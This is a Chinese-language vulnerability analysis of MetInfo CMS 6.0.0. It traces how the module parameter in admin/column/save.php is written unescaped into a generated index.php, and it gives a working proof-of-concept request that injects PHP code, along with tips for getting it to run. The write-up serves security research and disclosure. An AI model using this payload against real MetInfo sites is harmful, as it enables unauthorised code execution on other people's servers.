0x01 漏洞分析

漏洞关键点
位于/Applications/MxSrvs/www/MetInfo6.0.0/admin/include/global.func.php中约878行的Copyindx函数

1
2
3
4
5
6
7
8
function Copyindx($newindx,$type){
if(!file_exists($newindx)){
$oldcont ="<?php\n# MetInfo Enterprise Content Management System \n# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. \n\$filpy = basename(dirname(__FILE__));\n\$fmodule=$type;\nrequire_once '../include/module.php'; \nrequire_once \$module; \n# This program is an open source system, commercial use, please consciously to purchase commercial license.\n# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.\n?>";
$fp = fopen($newindx,w);
fputs($fp, $oldcont);
fclose($fp);
}
}

$type可控,并且直接带入到php代码中,前提是不存在 $newindx 变量,往上跟函数

位于/Applications/MxSrvs/www/MetInfo6.0.0/admin/column/global.func.php的124行调用该函数

1
Copyindx(ROOTPATH.$foldername.'/index.php',$module);

规定 $newindx 为目录名 + /index.php, 然后 $module 该文件

再往上跟,找到/Applications/MxSrvs/www/MetInfo6.0.0/admin/column/save.php

1
2
3
4
5
6
7
8
9
10
11
12
13
if($if_in==0){
if($filename!='' && $filename!=$filenameold){
$filenameok = $db->get_one("SELECT * FROM {$met_column} WHERE filename='{$filename}' and foldername='$foldername' and id!='$id'");
if($filenameok)metsave('-1',$lang_modFilenameok);
if(is_numeric($filename) && $filename!=$id && $met_pseudo){
$filenameok1 = $db->get_one("SELECT * FROM {$met_column} WHERE id='{$filename}' and foldername='$foldername'");
if($filenameok1)metsave('-1',$lang_jsx30);
}
}
$filedir="../../".$foldername;
if(!file_exists($filedir))@mkdir($filedir,0777);
if(!file_exists($filedir))metsave('-1',$lang_modFiledir);
column_copyconfig($foldername,$module,$id);

满足该条件即可调用colnmn_copyconfig()函数

攻击流程

  1. 登陆后台
  2. 构造payload:admin/column/save.php?name=123&action=editor&foldername=upload&module=22;phpinfo();/*
  3. 访问/upload/index.php

注意:

  1. foldername可控,如果upload目录下存在index.php,不会重复写入,更换目录即可
  2. /* 必须要求,会注释掉后面的require_once ‘../include/module.php’; 防止跳转到404页面

0x02 漏洞复现

3e67b9c86d5847910d672ea170c376e5